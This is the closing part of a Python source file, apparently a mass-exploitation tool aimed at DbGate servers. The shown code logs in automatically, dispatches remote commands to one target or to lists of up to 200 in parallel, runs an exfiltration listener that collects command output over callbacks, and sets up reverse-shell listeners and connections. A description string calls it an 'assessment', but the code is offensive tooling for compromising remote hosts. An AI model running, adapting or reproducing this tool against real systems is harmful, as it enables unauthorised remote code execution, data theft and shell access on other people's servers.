configuration") if cfg.mode == "mass": log_info(f" Mode : mass file={cfg.targets_file}") log_info(f" Threads : {cfg.threads}") else: log_info(f" Mode : single target={cfg.url}") log_info(f" Auth : POST /auth/login → Bearer (automatic)") log_info(f" Command : {cfg.command}") log_info(f" Vector : {cfg.vector}") log_info(f" Callback : {cfg.callback_url}") log_info(f" Listener : {cfg.listen_bind}:{cfg.listen_port}") print() def run_wizard() -> RunConfig: show_banner() log_info("AUTO — one question (optional: URL|command e.g. http://ip:3000|ls -la)") raw = ask("Target URL or list.txt", "http://127.0.0.1:3000") cfg = RunConfig() mode, target, opt_cmd = detect_target_input(raw) cfg.mode = mode if mode == "mass": cfg.targets_file = target if not os.path.isfile(cfg.targets_file): log_fail(f"List file not found: {cfg.targets_file}") sys.exit(1) else: cfg.url = ensure_target_url(target, DEFAULT_PORT) apply_auto_defaults(cfg) if opt_cmd: cfg.command = opt_cmd print_auto_summary(cfg) return cfg async def preflight_verify(cfg: RunConfig) -> bool: """Verify environment before any exploit attempt — abort if critical checks fail.""" log_info("═══ Preflight verification ═══") init_nx_output() if cfg.mode == "mass": if not os.path.isfile(cfg.targets_file): log_fail(f"List file missing: {cfg.targets_file}") return False urls, per_cmds, stats, errors = load_targets_smart( cfg.targets_file, cfg.default_port ) write_list_report( cfg.targets_file, stats, urls, errors, default_port=cfg.default_port, per_cmds=per_cmds, ) cfg.resolved_targets = urls cfg.target_commands = per_cmds if per_cmds: log_info(f"Per-target commands: {len(per_cmds)} line(s) with |command") log_info( f"List: raw={stats.raw} resolved={stats.resolved} " f"dup={stats.dup} invalid={stats.invalid} → {OUT_LIST_REPORT}" ) if stats.resolved == 0: log_fail("No valid targets after parsing list — fix list_report.txt") return False if stats.invalid > 0: log_warn(f"{stats.invalid} invalid lines — see {OUT_LIST_REPORT}") else: if not cfg.url: log_fail("No target URL") return False cfg.resolved_targets = [cfg.url] log_info(f"Target normalized: {cfg.url}") if cfg.reverse_shell and not cfg.check_only: log_info( f"Revsh: target should connect to {cfg.revsh_lhost}:{cfg.revsh_lport} " f"(listener bind {cfg.revsh_bind})" ) if cfg.mode != "single": log_fail("--reverse-shell supports single target (-u) only") return False if cfg.use_callback and not cfg.check_only and not cfg.reverse_shell: if cfg.callback_host in ("127.0.0.1", "localhost"): tgt = cfg.url or (cfg.resolved_targets[0] if cfg.resolved_targets else "") if tgt and "127.0.0.1" not in tgt and "localhost" not in tgt: log_warn( "Callback host is localhost but target looks remote — " "exfil may fail; set LAN IP in --callback-host" ) if cfg.mode == "single" and cfg.url and not cfg.token: log_info("Preflight: testing target reachability + auto-login...") if not await prefetch_token(cfg): log_fail("Preflight failed: cannot reach target or obtain token") return False log_ok("Preflight passed — starting scan") print() return True async def prefetch_token(cfg: RunConfig) -> bool: """Fetch Bearer token before scan (single target) so user sees it succeeded.""" if cfg.token or not cfg.url: return True login_body = cfg.login_body or {"amoid": "none"} client = DbGateExploit( cfg.url, timeout=cfg.timeout, verify_ssl=cfg.verify_ssl, login_body=login_body, ) connector = aiohttp.TCPConnector(ssl=cfg.verify_ssl, limit=1) async with aiohttp.ClientSession(connector=connector) as session: if not await client.probe_alive(session): log_fail(f"[{client.tag}] cannot reach target for login") return False if not await client.obtain_token(session): return False cfg.token = client.token return True def write_session_summary(cfg: RunConfig, stats: Dict[str, int]) -> None: doc = { "session": SESSION_ID, "mode": cfg.mode, "command": cfg.command, "vector": cfg.vector, "callback": cfg.callback_url, "reverse_shell": cfg.reverse_shell, "revsh_lhost": cfg.revsh_lhost, "revsh_lport": cfg.revsh_lport, "targets": cfg.resolved_targets, "stats": stats, "output_dir": os.path.abspath(OUT_DIR), } try: with open(OUT_SUMMARY, "w", encoding="utf-8") as fh: json.dump(doc, fh, indent=2) log_info(f"Summary → {OUT_SUMMARY}") except OSError: pass async def run_from_config(cfg: RunConfig) -> None: if not await preflight_verify(cfg): sys.exit(1) exfil_srv: Optional[HTTPServer] = None revsh_listener: Optional[TcpRevshListener] = None callback_url = cfg.callback_url if cfg.reverse_shell and not cfg.check_only: if cfg.mode != "single": log_fail("--reverse-shell: use -u for one target only") sys.exit(1) try: revsh_listener = TcpRevshListener(cfg.revsh_bind, cfg.revsh_lport) actual_revsh_port = revsh_listener.start() cfg.revsh_lport = actual_revsh_port cfg.command = build_reverse_shell_cmd(cfg.revsh_lhost, actual_revsh_port) log_ok( f"Revsh dial address (from target): " f"{cfg.revsh_lhost}:{actual_revsh_port}" ) except OSError as exc: log_fail(f"Cannot start reverse-shell listener: {exc}") sys.exit(1) if ( cfg.use_builtin_listener and cfg.use_callback and not cfg.check_only and not cfg.reverse_shell ): try: exfil_srv, actual_port = start_exfil_server( cfg.listen_bind, cfg.listen_port ) cfg.listen_port = actual_port callback_url = build_callback_url( cfg.callback_host or guess_lan_ip(), actual_port ) cfg.callback_url = callback_url log_ok(f"Callback URL (target must reach this): {callback_url}") log_info(f"Listener bind: {cfg.listen_bind}:{actual_port}") except OSError as exc: log_fail(f"Cannot start exfil listener: {exc}") sys.exit(1) command = "" if cfg.check_only else cfg.command if cfg.mode == "single": client = DbGateExploit( cfg.url, timeout=cfg.timeout, verify_ssl=cfg.verify_ssl, token=cfg.token, login_body=cfg.login_body, ) result = await client.full_chain( command=command, callback_url=callback_url if cfg.use_callback else None, vector=cfg.vector, check_only=cfg.check_only, async_exec=cfg.async_exec or cfg.reverse_shell, b64_exfil=cfg.b64_exfil, wait_exfil=cfg.wait_exfil, use_reverse_shell=cfg.reverse_shell, wait_revsh=cfg.wait_revsh, revsh_listener=revsh_listener, revsh_interactive=cfg.revsh_interactive, ) stats: Dict[str, int] = { "exfil": 0, "dispatch": 0, "vuln": 0, "fail": 0, "revsh": 0, } stats[result] = stats.get(result, 0) + 1 write_session_summary(cfg, stats) log_ok(f"Final result: {result.upper()} — {describe_result(result)}") if result == "exfil": log_ok(f"Per-target exfil → {nx_exfil_path(cfg.url)}") elif result == "revsh": if cfg.revsh_interactive: log_ok("Reverse TCP session ended — see Nx/revsh.txt") else: log_ok( "Reverse TCP verified (connection only) — see Nx/revsh.txt; " "add --revsh-interactive or use: nc -lvnp PORT" ) elif result == "dispatch": if cfg.reverse_shell: log_warn( "Not confirmed: no TCP reverse connection. " "Use an IP reachable from DbGate (Docker: host gateway, not 127.0.0.1)." ) else: log_warn( "Not confirmed: runner accepted the job but no output hit the listener. " "Try --callback-host with an IP reachable from the DbGate container." ) if revsh_listener: revsh_listener.close() return targets = cfg.resolved_targets if not cfg.check_only and cfg.use_callback and not callback_url: log_warn("Mass mode without callback — blind dispatch only") log_info( f"Mass scan: {len(targets)} targets threads={cfg.threads} " f"vector={cfg.vector}" ) stats = await mass_scan( targets, command, callback_url if cfg.use_callback else None, cfg.vector, cfg.check_only, max(1, min(cfg.threads, 200)), cfg.timeout, cfg.verify_ssl, cfg.token, cfg.login_body, cfg.async_exec, cfg.b64_exfil, cfg.wait_exfil if len(targets) == 1 else cfg.mass_wait_exfil, cfg.target_commands, ) print(Fore.MAGENTA + "─" * 80 + Style.RESET_ALL) log_ok( f"Done EXFIL={stats.get('exfil', 0)} DISPATCH={stats.get('dispatch', 0)} " f"VULN={stats.get('vuln', 0)} FAIL={stats.get('fail', 0)}" ) log_ok(f"Results in {os.path.abspath(OUT_DIR)}/") write_session_summary(cfg, stats) if exfil_srv: try: exfil_srv.shutdown() except Exception: pass if revsh_listener: revsh_listener.close() # ── optional CLI mode (--cli) ───────────────────────────────────────────────── def build_arg_parser() -> argparse.ArgumentParser: p = argparse.ArgumentParser(description="DbGate assessment — use without --cli for wizard") p.add_argument("--cli", action="store_true", help="Use command-line flags instead of wizard") p.add_argument("-u", "--url") p.add_argument("-f", "--file", default=DEFAULT_TARGETS) p.add_argument("-c", "--callback") p.add_argument("--cmd", "--command", dest="command", default="id") p.add_argument("--check-only", action="store_true") p.add_argument("--vector", choices=DbGateExploit.VECTORS, default="functionName") p.add_argument("--token") p.add_argument("--login-json", default='{"amoid":"none"}') p.add_argument("-t", "--threads", type=int, default=DEFAULT_CONCURRENCY) p.add_argument("--timeout", type=float, default=DEFAULT_TIMEOUT) p.add_argument("--port", type=int, default=DEFAULT_PORT) p.add_argument("--listen-host", default="0.0.0.0") p.add_argument("--listen-port", type=int, default=DEFAULT_CALLBACK_PORT) p.add_argument("--callback-host", help="IP/hostname targets use to reach your listener") p.add_argument("--async-exec", action="store_true") p.add_argument("--no-b64", action="store_true") p.add_argument("--wait-exfil", type=float, default=8.0) p.add_argument( "--reverse-shell", nargs="?", const="AUTO", metavar="LHOST:LPORT", help="TCP reverse shell (single -u only). Default: guessed LAN IP:4444", ) p.add_argument( "--revsh-bind", default="0.0.0.0", help="Local bind address for reverse-shell listener", ) p.add_argument( "--revsh-port", type=int, default=DEFAULT_REVSH_PORT, help="Local port when --reverse-shell has no LHOST:LPORT (default 4444)", ) p.add_argument( "--wait-revsh", type=float, default=15.0, help="Seconds to wait for reverse TCP after dispatch", ) p.add_argument( "--revsh-interactive", action="store_true", help="After reverse TCP connect, relay stdin/stdout (basic; nc is better for TTY)", ) p.add_argument( "--mass-wait-exfil", type=float, default=8.0, help="Per-target exfil wait in mass mode (default 8s; was capped at 3s)", ) p.add_argument("--secure", action="store_true", help="Enable TLS certificate verification") return p async def run_from_cli(args: argparse.Namespace) -> None: login_body, err = parse_login_json(args.login_json) if err: log_fail(err) sys.exit(1) cfg = RunConfig() cfg.mode = "single" if args.url else "mass" cfg.url = ensure_target_url(args.url, args.port) if args.url else "" cfg.targets_file = args.file cfg.default_port = args.port cfg.check_only = args.check_only cfg.command = args.command cfg.vector = args.vector cfg.token = args.token cfg.login_body = login_body cfg.threads = args.threads cfg.timeout = args.timeout cfg.verify_ssl = args.secure cfg.async_exec = args.async_exec cfg.b64_exfil = not args.no_b64 cfg.wait_exfil = args.wait_exfil cfg.mass_wait_exfil = args.mass_wait_exfil revsh_requested = args.reverse_shell is not None if revsh_requested: if not args.url: log_fail("--reverse-shell requires a single target: -u http://host:3000") sys.exit(1) if args.check_only: log_fail("--reverse-shell cannot be used with --check-only") sys.exit(1) try: lhost, lport = parse_revsh_endpoint(args.reverse_shell, args.revsh_port) except (ValueError, OSError) as exc: log_fail(f"Invalid --reverse-shell endpoint: {exc}") sys.exit(1) cfg.reverse_shell = True cfg.revsh_lhost = args.callback_host or lhost cfg.revsh_lport = lport cfg.revsh_bind = args.revsh_bind cfg.wait_revsh = args.wait_revsh cfg.revsh_interactive = args.revsh_interactive cfg.use_callback = False cfg.use_builtin_listener = False cfg.async_exec = True cfg.command = "" # built after listener bind in run_from_config log_info(f"Reverse shell mode → target dials {cfg.revsh_lhost}:{cfg.revsh_lport}") else: cfg.use_callback = bool(args.callback) or ( not args.check_only and bool(args.command) ) cfg.callback_url = args.callback cfg.listen_bind = args.listen_host cfg.listen_port = args.listen_port cfg.use_builtin_listener = not args.callback and not args.check_only if cfg.use_builtin_listener and not args.callback: cfg.callback_host = args.callback_host or guess_lan_ip() if not cfg.callback_url: cfg.callback_url = build_callback_url( cfg.callback_host, cfg.listen_port ) await run_from_config(cfg) async def async_main() -> None: parser = build_arg_parser() args = parser.parse_args() if args.cli: show_banner() await run_from_cli(args) else: cfg = run_wizard() await run_from_config(cfg) def main() -> None: try: asyncio.run(async_main()) except KeyboardInterrupt: print() log_warn("Interrupted") if __name__ == "__main__": main()